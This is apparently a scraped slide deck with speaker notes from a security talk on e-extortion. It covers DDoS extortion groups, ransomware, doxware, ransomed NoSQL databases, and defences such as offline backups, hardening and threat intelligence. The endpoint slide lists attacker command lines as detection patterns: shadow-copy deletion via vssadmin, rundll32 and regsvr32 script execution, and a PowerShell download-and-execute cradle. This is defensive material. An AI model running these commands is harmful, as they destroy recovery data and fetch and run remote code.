This document summarizes an presentation on e-extortion trends and defense. It discusses the evolution of extortion from early distributed denial of service attacks and ransomware to more sophisticated techniques that combine encryption, data exfiltration, and extortion demands. The presentation outlines strategies for defending against these threats, including backups, system hardening, endpoint security solutions, threat intelligence sharing, and following financial trails.
2. Cisco Confidential 2
Whoami
• Incident Response Analyst for Cisco Security Advisory Services.
Working with customers performing strategic, proactive, and reactive
response to information security issues
• 3 years – Insider threat analyst then Intrusion Forensics and Hunt Team
manager at JPMorgan Chase
• 13 years law enforcement performing digital forensics and computer
crime investigations
10. Cisco Confidential 10
Cats Catch Some Mice Again
• Early 2016 Interpol coordinated arrests of Armada Collective Members
in Australia, and DD4BC members in Bosnia and Herzegovinia
16. Cisco Confidential 16
Ransom Hits Home
• Publicly accessible NoSQL, Elasticsearch, Hadoop, Redis being
deleted with ransom note left.
• Completely unable to be recovered, EVEN IF YOU PAY
17. Cisco Confidential 17
The Gift That Keeps Giving
• In January, Cisco Talos researchers found new variants of Locky also
deliver Kovter click fraud Trojan
• http://blog.talosintel.com/2017/01/locky-struggles.html
18. Cisco Confidential 18
E-Extortion Trifecta
• Doxware brings all the extortion tactics
into one, and is becoming more
mainstream:
• Encryption
• Exfiltration
• Extortion demands
• Public Data Leak
19. Cisco Confidential 19
What We Know So Far
• History Repeats itself with the cat-and-mouse game, and innovation of the
mice
– We have to be ready for the next evolution of threats
• Getting to know your enemy can keep you from paying out to imposters
– We need to gain intelligence about our threats
• Even if you pay your enemy, what keeps them from coming back again and
again wanting more handouts?
– Let’s be prepared to defend ourselves and maintain business
continuity plans
20. Cisco Confidential 20
Ransom?
• “Without a hostage, there is no ransom. That’s what a ransom is.”
- The rules according to Walter Sobchak
21. Cisco Confidential 21
Backups – Offline if Possible
• CryptoFortress – encrypting unmapped shares
• SamSam – Criminal group obtaining foothold through LFI, conducting
surveillance, then encrypting everything including backup servers
22. Cisco Confidential 22
System Hardening
• Over 90% of PowerShell scripts analyzed by Symantec were malicious in 2016. If
endpoints don’t need PS, remove it
• If you can’t remove PS, disable ISE and REPL ability
• Application whitelisting
• Change default network options for NoSQL
• bind 127.0.0.1 instead of 0.0.0.0
• Change default ports to custom config to stifle script kiddies
• https://www.elastic.co/blog/protecting-against-attacks-that-hold-your-data-for-
ransom
• Restrict IP ranges that can access your NoSQL Instance
• Implement security group for cloud instances
• http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html
23. Cisco Confidential 23
Endpoint Solutions
• Able to review for heuristic patterns of binaries being called, and review
command line parameters such as:
• “Vssadmin.exe delete shadows /all /quiet del /f /q %0”
• “rundll32.exe C:Users$usernameAppDataLocalTemp”
• “rundll32.exe javascript:”mshtml,RunHTMLApplication<script execution
stuff>.RegRead(”HKCU<specific registry path>”) “ will interpret in the
command line as “rundll.exe mshtml.dll, $hexadecimal for entry point in
memory”
• “regsvr32.exe /s /u /i:< ^((http[s]?|ftp):/)?/?([^:/s]+)((/w+)*/)([w-
.]+[^#?s]+)(.*)?(#[w-]+)?$ > scrobj.dll
• “Powershell -nop -c "iex(New-Object Net.WebClient).DownloadString :
“^((http[s]?|ftp):/)?/?([^:/s]+)((/w+)*/)([w-.]+[^#?s]+)(.*)?(#[w-]+)?$ ’)"
• “Maliciousbinary.exe %windir%system32....%smstc.exe”
26. Cisco Confidential 26
One DDoS Does Not Fit All
• Volume Based Attacks – Goal is to overload bandwidth – UDP flood,
ICMP floods (Bits per second)
• Protocol Attacks – goal is to overload router, firewall, and GLB –
fragmented packets, Smurf Attack (spoof victim IP for requests
reflected at victim) (Packets per second)
• Application Attacks – goal is to overload the resources of the web
server – flood of GET or POST requests – Slowloris - creating
connections with only partial requests to leave connection open
(requests per second)
27. Cisco Confidential 27
Mirai
• Internet of Terribly Secured Things
opened the door to the most
geographically dispersed botnets for
DDoS
• Mirai takes over device and shuts off
Telnet, SSH, and HTTP ports so
remote access isn’t possible for
remediation
• Baby Monitors and CCTV cameras
responsible for high profile attacks
• Using dictionary of ~60 weak
passwords (less than the Morris
29. Cisco Confidential 29
DDoS Game Plan
• Be able to detect DDoS before
network is inaccessible, or systems
are crashing using NetFlow, system
resource, and Firewall traffic
monitoring dashboards
• Have a plan for blocking, dropping,
scrubbing, rate limiting traffic using
local appliances or a vendor
relationship
• Do not rely solely on an agreement
with ISP as your plan for DDoS
mitigation
Extortion threats and vulnerabilities were easier to gauge in the prior to the beginnings of e-extortion
Mafia-style extortion had some drawbacks, mainly due to easier attrition, and law enforcement action.
Through the entire life of extortion, the cat and mouse evolution stays the same though
As with all things, everything old is new again.
This threat resurfaced in 2013 without much change, in the wording, but was at least leveraging new technology and asking for bitcoin payment with a link to a BTC address.
History repeats itself in 2015 when the real armada collective causes harm to many email and financial institutions. The warning by DHS shows that there was a small DDoS attack, show of power, followed by an email demand for payment.
Lizard Squad received much media attention for it’s DDoS attacks on gaming networks despite giving warning of the attacks ahead of time on Twitter
They also chose to stop their Christmas, 2014 DDoS of the Xbox network after Kimdotcom
agreed to pay them in megaupload vouchers so he could play Destiny
After Armada Collective was arrested, this group sent phish emails to companies and cashed in without ever launching an attack. The MO of email before DDoS didn’t match what the real Armada Collective did, and it didn't’t take a costly Threat Intel feed to google the DHS alert to know how the real group operated differed.
All it takes is an email address to collect money if you can capitalize on a famous name. In 2015 multiple companies paid up to Phishing emails after seeing what the mighty Sony and Microsoft networks couldn’t stop from Lizard Squad.
We are now seeing the combination of ransomware with other types of malware to keep attacks active after the payment of ransom.
With high profile ransoms for breached data by certain actors, and the profitability of ransomware, why have these forces not combined
Ransomware with information stealing malware, to exfiltrate encrypted files, and then sell the data online if ransom not paid, or even if it is.
Ranscam differs from other ransomware families like Locky, Cryptolocker, Cerber etc, because even if you pay, they do not release your files.
Definitely good to know if you will be paying for nothing. Will be interesting to see how this changes the underground economy of ransomware.
Newer variant is Linux Killdisk. Demanding $250k
Victor Gevers Sec Res. Started noting Mongo DB being deleted Dec 26, 2016. Expanded to others.
Scriptable Actions, no recovery possible
Sigaint email addresses are in multiple campaigns
Even after files released on Locky payment, infection can remain
Combining Pony credential stealing with ransomware. Becoming more prevalent since Oct 2016, reported on by
https://www.scmagazine.com/researchers-spot-ransomware-with-abilities-to-leak-data-for-non-compliance/article/567622/
Big Lebowski. Found Bunny Lebowski went home, and the Germans kept trying to get the ransom money. WTF Walter said. Those are the rules. Is he the only one who cares about the rules
If we can keep ransomware from having any effect, then there is no ransom at all. Next slides discuss how.
Offline backups need emphasized with new ransomware variant CryptoFortress discovered in March 2016 seeking SMB paths not even mapped.
Samas targeting backup servers.
Have you tried to recover from those backups and seen if you process and backup style/age is conducive to it
Changes to PSEXEC key, terminal server key, PuTTY key
Disable ports and services not needed
Eliminate powershell if not needed
Disable REPL or ISE if powershell needed
Use VPS secure groups
https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/
Visibility to new MD5 on system, new services, scheduled jobs, registry key changes
Putty, terminal services, psexec keys etc
Application Whitelisting – alternatively limit executables to run only from certain paths
Disable unneeded ports and services (HTTP etc)
Defined roles on network shares with least privilege for user access
Privileged Account Management
If machines/shares are affected, is there a plan for continuity, to segment that machine, and route traffic around, or go to paper?
Game plan for detecting DDoS before there are saturated links, or system resource issues. Types of DDoS, discuss early detection from Lancope, or other systems, having a plan for blocking, dropping, monitoring, scrubbing.
In-network Appliances can mitigate application layer attacks – geo-blocking (50% of DDoS originating IP space in China), rate limiting, signatures of packets,
Partnership with Radware, Arbor, Cloudflare. Don’t rely on ISP as the only play in your playbook
Lizard squad also innovated with DDoS as a Service where anyone with a bitcoin or two could lease their power to shut down any site they wanted.
Recent Arrests of 3 in Israel who had profited $600,000 renting out DDoS infrastructure.
Game plan for detecting DDoS before there are saturated links, or system resource issues. Types of DDoS, discuss early detection from Lancope, or other systems, having a plan for blocking, dropping, monitoring, scrubbing.
In-network Appliances can mitigate application layer attacks – geo-blocking (50% of DDoS originating IP space in China), rate limiting, signatures of packets,
Partnership with Radware, Arbor, Cloudflare. Don’t rely on ISP as the only play in your playbook
To not be one of the statistics in the $100,000 paid in BTC to Armada Collective Imposters in 2016, or any amount to its peers, all a victim needed to do was look on Twitter or Google. Both perfectly good sources of Intel. A solid list of infosec leaders being followed on Twitter can be a great early warning system
Following the money might not be for everyone, but law enforcement are now able to track transactions of Bitcoin and track them all the way to the wallets. These type tools are also increasingly being used by financial institutions who need to comply with KYC regulations if they want to take part in any blockchain transactions. It’s how we know that $209 million has been paid out to ransomware in Q1 and Q2 2016
You can see if others are paying to the wallet from your issue. If not, maybe it is targeted?
Collage of Threat Intel Vendors, discussion of CIM, STIX, TAXI and integration
Visualize Your own logs from Phishing campaigns, bucketing for work groups, M&A activity, projects people are on.
Collecting data for who the recipients are for phishing emails can begin to show you relationships, especially if you use a visualization tool such as i2 analysts notebook, Splunk, or on the free side, an ELK stack. Are there common recipients between campaigns, does this happen often, are they in the same workgroup, are they working on a deal with the same external customer, could that customer have had a breach causing a leak of emails, or is that customer possibly doing their own recon? It has been known to happen
A word cloud will be weighted to show the most common terms as larger, and can be valuable for showing any common items that could be used for detection, or just to know trends.
This can be valuable not only for real phishing, but for phishing training to know what your employees are more susceptible to